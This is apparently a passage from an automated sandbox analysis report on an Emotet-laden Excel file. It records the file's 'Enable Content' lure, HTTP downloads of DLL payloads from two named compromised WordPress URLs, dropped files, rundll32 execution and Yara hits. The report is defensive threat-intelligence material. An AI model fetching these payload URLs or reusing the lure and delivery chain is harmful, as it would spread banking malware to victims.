194.233.67.242	sadabahar.com.np	Germany		6659	NEXINTO-DE	false

Contacted Domains

Name	IP	Active
www.duoyuhudong.cn	47.96.4.95	true
sadabahar.com.np	194.233.67.242	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.duoyuhudong.cn/wp-content/we8xi/	true	Avira URL Cloud: malware	unknown
http://sadabahar.com.np/wp-includes/pUMqITCt83a/	false	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:	Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/	Avira URL Cloud: Label: malware

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E450927 FindFirstFileExW,

3_2_6E450927

Software Vulnerabilities:

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: VZZdgPFp2xiOJtfpv[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: sadabahar.com.np

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Networking:

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

Source: global traffic

Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/3 equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.c
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.co
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.n
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/w
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-i
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-inc
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-inclu
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/A
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/J
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
Source: EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/
Source: EXCEL.EXE, 00000000.00000002.747914705.000000000046C000.00000004.00000020.sdmp	String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: sadabahar.com.np

Source: global traffic	HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 4	Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 4	Screenshot OCR: Enable Content" button 6 7 8 9 ,, G' 11 12 13 14 15 16 17 18 ^
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 8	Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 8	Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" button
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" button

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\besta.ocx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll			Jump to dropped file

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\

Jump to behavior

Detected potential crypto function

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6753	0_2_025E6753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6743	0_2_025E6743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6340	0_2_025E6340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E66F3	0_2_025E66F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E66E8	0_2_025E66E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE1291	3_2_01EE1291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDEA55	3_2_01EDEA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDEDED	3_2_01EDEDED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC51EC	3_2_01EC51EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA3E7	3_2_01ECA3E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC19C0	3_2_01EC19C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC75D2	3_2_01EC75D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDDDA5	3_2_01EDDDA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0BA4	3_2_01ED0BA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE5A7	3_2_01EDE5A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED89A2	3_2_01ED89A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC43BE	3_2_01EC43BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC59BF	3_2_01EC59BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDD7BE	3_2_01EDD7BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED85B8	3_2_01ED85B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE3B5	3_2_01EDE3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC358B	3_2_01EC358B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDDB87	3_2_01EDDB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC8D80	3_2_01EC8D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC4B81	3_2_01EC4B81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3782	3_2_01ED3782
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC7795	3_2_01EC7795
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED1591	3_2_01ED1591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECB191	3_2_01ECB191
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCF6E	3_2_01ECCF6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECBD61	3_2_01ECBD61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE0370	3_2_01EE0370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED6540	3_2_01ED6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA92F	3_2_01ECA92F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED9124	3_2_01ED9124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECF73B	3_2_01ECF73B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDCD35	3_2_01EDCD35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3D0C	3_2_01ED3D0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDBF0C	3_2_01EDBF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED590E	3_2_01ED590E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED970A	3_2_01ED970A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE10A	3_2_01EDE10A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC4D1E	3_2_01EC4D1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCB13	3_2_01ECCB13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED56E9	3_2_01ED56E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECC0EA	3_2_01ECC0EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC40E2	3_2_01EC40E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED40FE	3_2_01ED40FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC46FA	3_2_01EC46FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC1EFB	3_2_01EC1EFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED62F5	3_2_01ED62F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED4CF5	3_2_01ED4CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC84F0	3_2_01EC84F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE20CE	3_2_01EE20CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED10CD	3_2_01ED10CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC92C1	3_2_01EC92C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC2CC2	3_2_01EC2CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE1CDB	3_2_01EE1CDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC90D4	3_2_01EC90D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED28D5	3_2_01ED28D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED52D1	3_2_01ED52D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECF48A	3_2_01ECF48A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA083	3_2_01ECA083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECFE9D	3_2_01ECFE9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE899	3_2_01EDE899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDA29B	3_2_01EDA29B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED009A	3_2_01ED009A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0E97	3_2_01ED0E97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDCE90	3_2_01EDCE90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0A93	3_2_01ED0A93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3A6C	3_2_01EC3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC6869	3_2_01EC6869
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECB464	3_2_01ECB464
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECEE60	3_2_01ECEE60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC387F	3_2_01EC387F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECFA78	3_2_01ECFA78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDB677	3_2_01EDB677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC544C	3_2_01EC544C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECAA4E	3_2_01ECAA4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED7445	3_2_01ED7445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3043	3_2_01ED3043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECAE43	3_2_01ECAE43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCE5A	3_2_01ECCE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC6453	3_2_01EC6453
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED282D	3_2_01ED282D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3228	3_2_01EC3228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC9824	3_2_01EC9824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC243F	3_2_01EC243F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3432	3_2_01EC3432
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC800A	3_2_01EC800A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDC205	3_2_01EDC205
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE261E	3_2_01EE261E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E439F10	3_2_6E439F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4377B4	3_2_6E4377B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43D530	3_2_6E43D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E431DE0	3_2_6E431DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E433A90	3_2_6E433A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E440380	3_2_6E440380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44E3A1	3_2_6E44E3A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E436070	3_2_6E436070
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4410C0	3_2_6E4410C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43A890	3_2_6E43A890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43E890	3_2_6E43E890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4368B0	3_2_6E4368B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A243F	6_2_001A243F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A9824	6_2_001A9824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BEA55	6_2_001BEA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AB464	6_2_001AB464
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C1291	6_2_001C1291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C20CE	6_2_001C20CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B10CD	6_2_001B10CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A92C1	6_2_001A92C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B40FE	6_2_001B40FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B9124	6_2_001B9124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACF6E	6_2_001ACF6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3782	6_2_001B3782
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BDB87	6_2_001BDB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C261E	6_2_001C261E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A800A	6_2_001A800A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BC205	6_2_001BC205
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3432	6_2_001A3432
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3228	6_2_001A3228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B282D	6_2_001B282D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACE5A	6_2_001ACE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A6453	6_2_001A6453
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AAA4E	6_2_001AAA4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A544C	6_2_001A544C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3043	6_2_001B3043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AAE43	6_2_001AAE43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B7445	6_2_001B7445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AFA78	6_2_001AFA78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A387F	6_2_001A387F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BB677	6_2_001BB677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A6869	6_2_001A6869
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3A6C	6_2_001A3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AEE60	6_2_001AEE60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BA29B	6_2_001BA29B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B009A	6_2_001B009A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE899	6_2_001BE899
